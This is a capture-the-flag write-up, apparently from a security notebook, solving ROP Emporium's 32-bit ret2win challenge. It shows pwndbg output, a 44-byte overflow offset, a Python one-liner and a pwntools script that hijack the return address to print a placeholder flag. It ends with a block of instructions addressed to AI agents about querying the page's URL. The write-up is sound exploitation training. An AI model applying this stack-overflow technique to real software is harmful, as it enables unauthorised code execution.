# Binary Exploitation (Pwn)
## ROP Emporium
>
>
> To download all challenge:
>
>
### Ret2win
When we run the program and enter a bunch of `a` . It was segmentation fault
```bash
┌─[sheinn101@parrot]─[~/ctf/rop_emporium/ret2win]
└──╼ [??]$ ./ret2win32
ret2win by ROP Emporium
x86
For my first trick, I will attempt to fit 56 bytes of user input into 32 bytes of stack buffer!
What could possibly go wrong?
You there, may I have your input please? And don't worry about null bytes, we're using read()!
> aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Thank you!
Segmentation fault
```
`info functions`
```bash
pwndbg> info functions
All defined functions:
Non-debugging symbols:
0x08048374 _init
0x080483b0 read@plt
0x080483c0 printf@plt
0x080483d0 puts@plt
0x080483e0 system@plt
0x080483f0 __libc_start_main@plt
0x08048400 setvbuf@plt
0x08048410 memset@plt
0x08048420 __gmon_start__@plt
0x08048430 _start
0x08048470 _dl_relocate_static_pie
0x08048480 __x86.get_pc_thunk.bx
0x08048490 deregister_tm_clones
0x080484d0 register_tm_clones
0x08048510 __do_global_dtors_aux
0x08048540 frame_dummy
0x08048546 main
0x080485ad pwnme
0x0804862c ret2win
0x08048660 __libc_csu_init
0x080486c0 __libc_csu_fini
0x080486c4 _fini
```
Disassemble `ret2win`
```
pwndbg> disassemble ret2win
Dump of assembler code for function ret2win:
0x0804862c <+0>: push ebp
0x0804862d <+1>: mov ebp,esp
0x0804862f <+3>: sub esp,0x8
0x08048632 <+6>: sub esp,0xc
0x08048635 <+9>: push 0x80487f6
0x0804863a <+14>: call 0x80483d0
0x0804863f <+19>: add esp,0x10
0x08048642 <+22>: sub esp,0xc
0x08048645 <+25>: push 0x8048813
0x0804864a <+30>: call 0x80483e0
0x0804864f <+35>: add esp,0x10
0x08048652 <+38>: nop
0x08048653 <+39>: leave
0x08048654 <+40>: ret
```
It has `system` function which is `/bin/cat flag.txt`
Generate pattern with `cyclic` , run the program and paste it.
```
pwndbg> cyclic 100
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa
pwndbg>
```
To know the offset , run `cyclic -l laaa` .
Now we know the offset is `44` ,So the payload will be like this. `A*44 + ret2win` address which is `cat flag.txt`
Check the address of `ret2win` function
```
pwndbg> p ret2win
$1 = {} 0x804862c
pwndbg>
```
Change it that address to little endian like this `\x2c\x86\x04\x08`
```javascript
┌─[sheinn101@parrot]─[~/ctf/rop_emporium/ret2win]
└──╼ [??]$ python -c 'print "A"*44 + "\x2c\x86\x04\x08"' | ./ret2win32
ret2win by ROP Emporium
x86
For my first trick, I will attempt to fit 56 bytes of user input into 32 bytes of stack buffer!
What could possibly go wrong?
You there, may I have your input please? And don't worry about null bytes, we're using read()!
> Thank you!
Well done! Here's your flag:
ROPE{a_placeholder_32byte_flag!}
Segmentation fault
```
Script with `pwntools`
```python
#!/usr/bin/python3
from pwn import *
elf = context.binary = ELF('./ret2win32',checksec=False)
p = process()
padding = 44
payload = flat(
asm('nop') * padding,
elf.symbols['ret2win'],
)
# f = open("payload", "wb")
# f.write(payload)
p.sendlineafter(">", payload)
p.interactive()
```
```
─[sheinn101@parrot]─[~/ctf/rop_emporium/ret2win]
└──╼ [??]$ python3 auto_pwn.py
[+] Starting local process '/home/sheinn101/ctf/rop_emporium/ret2win/ret2win32': pid 432041
[*] Switching to interactive mode
Thank you!
Well done! Here's your flag:
ROPE{a_placeholder_32byte_flag!}
[*] Got EOF while reading in interactive
```
{% hint style="warning" %}
Comming Soon...
{% endhint %}
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://l33t-en0ugh.gitbook.io/infosec/capture-the-flag-ctf/binary-exploitation-pwn.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.